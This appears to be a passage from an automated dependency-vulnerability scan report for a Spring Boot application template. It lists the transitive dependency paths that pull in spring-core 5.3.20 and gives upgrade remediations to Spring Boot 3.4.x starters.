  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
